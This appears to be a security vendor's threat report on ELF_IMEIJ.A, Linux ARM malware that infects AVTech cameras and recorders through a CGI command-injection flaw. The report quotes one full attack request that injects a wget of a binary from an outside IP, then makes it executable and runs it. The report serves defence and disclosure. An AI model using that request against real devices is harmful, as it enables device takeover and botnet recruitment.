Linux has long been the preferred operating system for enterprise platforms and Internet of Things (IoT) manufacturers. Linux-based devices are continually being deployed in smart systems across many different industries, with IoT gateways facilitating connected solutions and services central to different businesses. In connection to their widespread use, we’ve also seen the number of Linux-focused security threats on the rise. We previously reported on a string of Linux threats in 2016, the most high-profile of which was the Mirai malware (detected by Trend Micro as ELF_MIRAI family).
A new addition to the list of Linux threats is the recently detected Linux ARM malware ELF_IMEIJ.A (detected by Trend Micro as ELF_IMEIJ.A). The threat exploits a vulnerability in devices from AVTech, a surveillance technology company. The vulnerability was discovered and reported by Search-Lab, a security research facility, and was disclosed to AVTech on October 2016. However, even after repeated attempts by Search-Lab to contact the vendor there was no response.
Infection flow and comparisons to similar malware
The malware arrives via RFIs in cgi-bin scripts. A remote attacker sends this request to random IP addresses and attempts to take advantage of the vulnerability:
POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 hxxp://192[.]154[.]108[.]2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1
Specifically, it exploits CloudSetup.cgi, the reported AVTech CGI Directory vulnerability, to execute a command injection that triggers the malware download. The attacker tricks the device into downloading the malicious file and changes the file's permissions to execute it locally.
Figure 1. The infection flow of ELF_IMEIJ.A
The points of entry for this new Linux malware are connected AVTech devices such as IP cameras, CCTV equipment, and network recorders that support the AVTech cloud. Once the malware is installed onto the device, it gathers system information and network activity data. It can also execute shell commands from the malicious actor, initiate Distributed Denial of Service (DDoS) attacks, and terminate itself. Infected devices also put other devices connected to the same network at risk.
There are three IP addresses where ELF_IMEIJ.A can be downloaded, and they are hosted on two separate ISPs.
The IP addresses that we observed connecting to the download links are registered with an ISP based in South Korea.
According to reports, AVTech has over 130,000 different devices connected to the Internet, so this attack may be used to gain and maintain persistent access to these devices. The devices can also be turned into bots and used to drive large scale DDoS attacks. Like most connected devices, the targets are not secured by default and are impossible to directly monitor.
ELF_IMEIJ.A’s DDoS capabilities may bring around comparisons to Mirai, but they also have distinct differences:
|Used Ports||7547 5555 48101||39999|
|Exploits||Devices with BusyBox software installed by bruteforce||Devices unsecured cgi-bin scripts to install the malware ELF_IMEIJ.A|
ELF_IMEIJ.A joins a group of recently discovered malware that exploits the ARM platform on Linux devices. ARM is widely used for IoT and mobile devices, making it a necessary hurdle for attackers targeting these devices. Aside from IMEIJ, the malware group includes the Umbreon rootkit (detected by Trend Micro as ELF_UMBREON) and the LuaBot (detected by Trend Micro as ELF_LUABOT).
Trend Micro™ Security and Trend Micro Internet Security offer effective protection for this threat, with security features that can detect malware at the endpoint level. To protect connected devices Trend MicroTM Home Network Security can check internet traffic between the router and the devices connected to it. Enterprises can also use Trend Micro™ Deep Discovery™ Inspector which is a network appliance that monitors all ports and over 105 different network protocols to discover advanced threats and targeted attacks.
The IMEIJ sample has the following SHA256 hash: 8040422762138d28aa411d8bb2307a93432416f72b292bf884fb7c7efde9f3f5